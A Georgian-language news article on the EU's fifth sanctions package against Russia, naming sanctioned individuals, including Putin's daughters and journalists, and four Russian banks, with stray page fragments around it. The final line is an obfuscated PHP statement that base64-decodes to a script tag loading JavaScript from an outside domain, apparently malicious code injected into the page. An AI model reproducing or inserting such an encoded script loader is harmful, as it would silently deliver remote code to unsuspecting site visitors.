celsiusi
ავერსი შნაიდერი
ევროკავშირმა რუსეთის წინააღმდეგ ახალი სანქციები გამოაქვეყნა. ევროკავშირი სანქციებს უწესებს 217 რუს ფიზიკურ და 18 იურიდიულ პირს, ასევე, ჟურნალისტებს რუსეთიდან და ლუგანსკისა და დონეცკის თვითგამოცხადებული რესპუბლიკებიდან.
 
"დღევანდელი გადაწყვეტილება შემაკავებელი ზომების მეხუთე პაკეტის ნაწილია, რომელიც ევროკავშირმა დააწესა რუსეთის მიერ უკრაინის წინააღმდეგ სამხედრო აგრესიის გამო" - წერს ევროკავშირი.
 
ევროკავშირის განმარტებით, სანქცირებულ პირებს გაეყინებათ აქტივები და ევროკავშირის წევრი ქვეყნების მოქალაქეებსა და კომპანიებს მათი დახმარება აეკრძალებათ. ამასთან, ისინი ვერ შეძლებენ შესვლას ევროკავშირის ტერიტორიაზე.
 
ფიზიკურ პირებს შორის არიან კრემლის მაღალჩინოსნები პუტინის შვილები კატერინა ტიხონოვა და მარია ვორონცოვა, ასევე ალექსი ფილატოვი, იგოტ მასლოვი, ვიაჩესლავ კანტორი, ალექსი პიმანოვი, იგორ კოროჩენკო, ვლადიმერ სუნგორკინი, ოლეგ დობროდეევი, პაველ გუსევი, ელენა პეტროვნა, ძმები როტენბერგები, კირილ შამალოვი და აშ.
 
იურიდიული პირებს შორის ოთხი მსხვილი რუსული ბანკია: Bank Otkritie, Novikombank, Sovcombank, და VTB. 
 
შეგახსენებთ, რომ ევროკავშირმა რუსეთის წინააღმდეგ სანქციების მეხუთე პაკეტი გუშინ დაამტკიცა.
849
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");